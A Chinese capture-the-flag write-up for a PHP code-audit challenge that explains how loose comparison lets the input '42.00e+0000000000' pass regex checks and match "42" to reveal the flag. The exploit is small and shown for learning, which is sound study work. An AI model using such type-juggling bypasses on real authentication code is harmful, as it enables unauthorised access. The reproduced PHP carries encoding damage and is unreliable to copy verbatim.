右键查看源码,发现有提示source.txt,打开链接
<?phpif ?("POST" == $_SERVER[‘REQUEST_METHOD‘]){ ???$password = $_POST[‘password‘]; ???if (0 >= preg_match(‘/^[[:graph:]]{12,}$/‘, $password)) ???{ ???????echo ‘Wrong Format‘; ???????exit; ???} ???while (TRUE) ???{ ???????$reg = ‘/([[:punct:]]+|[[:digit:]]+|[[:upper:]]+|[[:lower:]]+)/‘; ???????if (6 > preg_match_all($reg, $password, $arr)) ???????break; ???????$c = 0; ???????$ps = array(‘punct‘, ‘digit‘, ‘upper‘, ‘lower‘); ???????foreach ($ps as $pt) ???????{ ???????????if (preg_match("/[[:$pt:]]+/", $password)) ???????????$c += 1; ???????} ???????if ($c < 3) break; ???????if ("42" == $password) ????????????require ‘flag鏂囦欢‘; ???????else echo ‘Wrong password‘; ???????exit; ???}}将用户输入的密码进行3次正则判断,符合 "42" == $password 才会给出flag
三个正则分别是
- 可见字符超过12个
- 字符串中,把连续的大写,小写,数字,符号作为一段,至少分六段,例如
a12SD+io8可以分成a12SD+io8六段 - 大写,小写,数字,符号这四种类型至少要出现三种
PHP在判断相等时做出的变化var_dump("1" == "01"); // 1 == 1 -> truevar_dump("10" == "1e1"); // 10 == 10 -> truevar_dump(100 == "1e2"); // 100 == 100 -> true根据这个就可以构造出来password: 42.00e+0000000000
<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">
来自为知笔记(Wiz)
php代码审计题目
原文地址:http://www.cnblogs.com/name1ess/p/7956461.html